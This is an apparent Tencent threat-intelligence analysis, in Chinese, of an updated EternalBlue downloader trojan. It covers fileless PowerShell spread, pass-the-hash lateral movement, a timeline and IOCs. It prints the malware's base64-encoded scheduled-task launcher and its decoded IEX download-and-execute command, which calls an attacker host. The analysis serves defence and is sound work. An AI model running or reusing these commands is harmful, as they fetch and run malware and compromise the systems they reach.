产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
未登录- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
正文永恒之蓝木马下载器再次更新:更新无文件攻击模块
2019-03-29 03:28:24
背景
腾讯御见威胁情报中心3月28日检测到永恒之蓝下载器木马再次更新,变化主要在“无文件”攻击模块,该版本的攻击代码全部以Powershell脚本形式执行,在此前的基础上新增扫描函数Invoke-SE,并在其中通过SMBExec(pass the hash)来进行横向移动感染。
此前已有的攻击方式为永恒之蓝漏洞攻击、WMI弱口令爆破、SMBClient(pass the hash),更新后木马的传播能力再次增强。新的攻击方式会在攻击后的Payload中直接在目标机器创建后门计划任务,并通过该计划任务将木马具有的多个恶意程序进行下载。
无文件攻击感染流程
“永恒之蓝”木马下载器黑产团伙活动情况时间线:
|
2018年12月14日 |
利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 |
|
2018年12月19日 |
下载之后的木马新增Powershell后门安装。 |
|
2019年1月09日 |
检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 |
|
2019年1月24日 |
木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。 |
|
2019年1月25日 |
木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。 |
|
2019年2月10日 |
将攻击模块打包方式改为Pyinstaller. |
|
2019年2月20日 |
更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 |
|
2019年2月23日 |
攻击方法再次更新,新增MsSQL爆破攻击。 |
|
2019年2月25日 |
在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 |
|
2019年3月6日 |
通过已感染机器后门更新Powershell脚本横向传播模块ipc。 |
|
2019年3月8日 |
通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 |
|
2019年3月14日 |
通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 |
|
2019年3月28日 |
更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 |
详细分析
更新地址:hxxp://27.102.130.126/new.dat
MD5:E05827E44D487D1782A32386123193EF
更新1:新增攻击方式:Invoke-SMBExec, 利用NTLM hash字典进行Pass the Hash攻击,然后在目标机器执行命令
内置的Hash字典:
Invoke-SMBExec攻击代码:
更新2:在Payload中通过命令添加新的Powershell后门计划任务:
计划任务名:\Microsoft\windows\Rass
启动程序:powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdwBtAD8AcwBtAGIAJwApAA==
对应的Powershell代码解码:
IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/wm?smb')
该计划任务负责下载执行Powershell脚本wm,该脚本首先通过日志判断是否已经被感染,然后搜集详细的电脑信息上传,并下载多个木马执行,安装多个计划任务后门。具体行为如下:
1、搜集mac地址、杀软信息、系统版本、用户名、域名等信息并上传
2、判断具有管理员权限时安装计划任务\Microsoft\windows\ + $mac(下载执行hxxp://v.y6h.net/g?h),若没有管理员权限则安装计划任务$mac(下载执行hxxp://v.y6h.net/g?l)
3、安装计划任务Credentials,负责下载执行Powershell脚本hxxp://128.199.64.236/new.dat?allVVV5
4、下载执行木马hxxp://128.199.64.236/mn.dat?allVVV5
5、具有管理员权限安装随机名计划任务\Microsoft\Windows\$pname(没有管理员权限则安装计划任务为$pname),执行下载的木马hxxp://128.199.64.236/ii.dat?p=allVVV5
6、下载执行木马hxxp://27.102.130.126/ddd.dat?allVVV5
7、下载执行Powershell脚本hxxp://27.102.107.137/status.json?allVVV5
8、下载执行Powershell脚本hxxp://27.102.130.126/new.dat?allVVV5
安全建议
1.服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
3.使用杀毒软件拦截可能的病毒攻击;
4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
IOCs
IP
27.102.130.126
128.199.64.236
27.102.107.137
URL
hxxp://v.beahh.com/wm?smb
hxxp://v.y6h.net/g?l
hxxp://27.102.130.126/new.dat?allVVV5
hxxp://128.199.64.236/new.dat?allVVV5
hxxp://128.199.64.236/mn.dat?allVVV5
hxxp://128.199.64.236/ii.dat?p=allVVV5
hxxp://27.102.130.126/ddd.dat?allVVV5
hxxp://27.102.107.137/status.json?allVVV5
hxxp://v.beahh.com/eb?32
hxxp://v.beahh.com/eb?64
md5
e05827e44d487d1782a32386123193ef
66ea09330bee7239fcb11a911f8e8ea3
470b4f5bc84db74ab1935186a3b5219f
8a2042827a7fcd901510e9a21c9565a8
fa13fd1bb0a2faac06cb94592dd6bb1b
6d444144d8e7a07cba1fd5b042a49012
在线咨询
方案定制